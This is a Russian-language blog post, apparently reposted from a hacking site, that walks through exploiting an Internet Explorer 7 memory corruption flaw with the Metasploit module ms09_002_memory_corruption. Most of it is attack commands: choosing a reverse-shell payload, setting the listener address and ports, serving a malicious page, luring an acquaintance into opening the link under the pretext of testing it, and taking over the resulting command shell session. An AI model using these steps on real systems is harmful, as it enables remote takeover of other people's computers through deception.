lundi 22 mars 2010

Ломаем IE

Обзор использования уязвимости Internet Explorer (или ломаем IE)

Сегодня я расскажу об использовании уязвимости в Internet Explorer. Уязвимость эта более чем актуальная,т.к. бюллетень был опубликован лишь в середине февраля 2009.

Как видно из названия статьи, для работы нам потребуется Metasploit Framework 3.3 с последними обновлениями.Итак, открываем консоль метасплойта и командуем show

в списке Exploits находим то,что нам нужно и пишем:

use exploit/windows/browser/ms09_002_memory_corruption

Мы выбрали эксплойт,теперь надо прикрутить начинку.Я для примера использовал windows/shell_reverse_tcp, вы можете выбрать любую другую из того же списка,который нам выдаёт метасплойт по команде show

Так же можно скомандовать info, чтобы посмотреть какие настройки сплойта нам надо задать

Переходим к настройкам

set LHOST 0.0.0.0 - ваш ip
set LPORT 1234 - порт для сплойта, можете писать любой

set SRVPORT 80 - порт для браузера,в принципе параметр можно не задавать,тогда порт в ссылке будет 8080

set URIPATH .....html - название страницы в сылке,необязательный параметр


Вот и всё.Командуем exploit!!!

Server started - это значит что пора просить BLC ,чтобы он затестил как отображается моя страничка, url котоорой прописан в поле Local IP:, в браузере IE Даём ему ссылку и далее, когда в консоли появятся следующие строки..

Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to
0.0.0.0:64239...[*] Command shell session 3 opened
(0.0.0.0:1234 -> 0.0.0.0:64240

...открываем активную сессию

sessions -i 3

(...а тем временем BLC пытается закрыть повисший IE, но у него это не получается, закрывает только через диспечер задач, но сессия всёравно остаётся активной)

Далее мы имеет в своём распоряжении открытую cmd.

Осталось объяснить как открыть консоль метасплойта.Для этого запускаем в GUI режиме метасплойт и жмём ctrl+O, либо в меню window - console

EbriPsy co stopxaker.ru

Aucun commentaire:

Enregistrer un commentaire